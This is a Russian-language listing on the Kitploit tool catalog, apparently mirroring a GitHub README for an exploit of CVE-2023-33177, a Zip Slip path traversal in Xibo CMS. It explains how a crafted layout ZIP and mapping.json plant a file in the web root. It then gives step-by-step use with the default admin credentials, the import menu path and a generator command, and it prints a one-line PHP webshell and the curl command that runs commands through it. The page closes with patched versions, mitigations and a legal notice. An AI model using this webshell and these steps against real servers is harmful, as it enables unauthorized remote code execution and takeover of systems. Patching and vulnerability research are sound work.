Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — Этот эксплойт демонстрирует **уязвимость обхода пути** в Xibo CMS (CVE-2023-33177), которая позволяет удаленно выполнять код через импорт вредоносных макетов. | Kitploit
Инструменты/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

Этот эксплойт демонстрирует **уязвимость обхода пути** в Xibo CMS (CVE-2023-33177), которая позволяет удаленно выполнять код через импорт вредоносных макетов.

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Xibo CMS Zip Slip RCE Эксплойт CVE-2023-33177

Этот эксплойт демонстрирует уязвимость обхода пути в Xibo CMS (CVE-2023-33177), которая позволяет удаленное выполнение кода через вредоносные импорты макетов.

Детали уязвимости

CVE/Рекомендация: CVE-2023-33177 Затронутые версии:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

Тип уязвимости: Обход пути (Zip Slip) Воздействие: Удаленное выполнение кода (RCE)

Техническое описание

Xibo CMS позволяет аутентифицированным пользователям импортировать файлы макетов через ZIP-архивы. Функция импорта не выполняет должную проверку путей файлов в файле mapping.json, что позволяет злоумышленнику записывать файлы за пределами целевой директории библиотеки с использованием последовательностей обхода пути (../../).

Как работает эксплойт

  1. Создает корректную структуру экспорта макета Xibo с необходимыми JSON-файлами
  2. Внедряет обход пути в mapping.json: Использует в качестве пути файла
../../web/shell.php
  • Помещает веб-шелл в обойденный путь внутри ZIP-структуры по адресу library/../../web/shell.php
  • Xibo извлекает без проверки: Разрешается в /var/www/cms/web/shell.php
  • Достигает RCE: Веб-шелл доступен в корневой директории веб-сервера
  • Цепочка уязвимости

    root@kitploit:~
    Zip contains: library/../../web/shell.php
    Xibo reads:   library/ + ../../web/shell.php (from mapping.json)
    Xibo writes:  /var/www/cms/library/temp/ + ../../web/shell.php
    Result:       /var/www/cms/web/shell.php ← Webshell in web root!
    

    Использование

    Генерация эксплойта

    root@kitploit:~
    python3 create_exploit.py
    

    Это создает exploit.zip, содержащий вредоносный пакет макета.

    Шаги эксплуатации

    1. Получите доступ к Xibo CMS и войдите с учетными данными (по умолчанию: xibo_admin / password)
    2. Перейдите к импорту: Design → Layouts → Import
    3. Загрузите exploit.zip
    4. Игнорируйте любые JSON-ошибки - веб-шелл уже записан на диск
    5. Выполняйте команды через веб-шелл:
      root@kitploit:~
      curl 'http://localhost:8080/shell.php?cmd=id'
      

    Структура файла

    Эксплойт ZIP содержит:

    root@kitploit:~
    exploit.zip
    ├── layout.json          # Valid Xibo layout definition
    ├── playlist.json        # Empty playlist (triggers JSON import)
    ├── mapping.json         # Contains path traversal payload
    └── library/
        └── ../../web/
            └── shell.php    # PHP webshell (gets extracted to web root)
    

    Функциональность веб-шелла

    Встроенный веб-шелл минимален:

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    

    Доступ к нему: http://<target>/shell.php?cmd=<command>

    Меры защиты

    Исправленные версии:

    • Обновитесь до Xibo CMS 2.3.17+ (для ветки 2.x)
    • Обновитесь до Xibo CMS 3.3.5+ (для ветки 3.x)

    Стратегии защиты:

    1. Проверяйте все пути файлов в ZIP-архивах перед извлечением
    2. Отклоняйте пути, содержащие .. или абсолютные пути
    3. Используйте безопасные методы извлечения, предотвращающие обход каталогов
    4. Внедрите правильную проверку входных данных в функции импорта
    5. Ограничьте разрешения на загрузку файлов только для аутентифицированных и авторизованных пользователей

    Правовое и этическое уведомление

    Этот эксплойт предоставлен для:

    • Образовательных целей
    • Соревнований CTF
    • Авторизованного тестирования безопасности
    • Исследований в области защитной безопасности

    Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

    Ссылки

    • Рекомендация: GHSA-jj27-x85q-crqv
    • Xibo CMS: https://xibo.org.uk/
    • Zip Slip Vulnerability: https://security.snyk.io/research/zip-slip-vulnerability
    • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

    Автор

    complexusprada Ноябрь 2025

    Скачать инструмент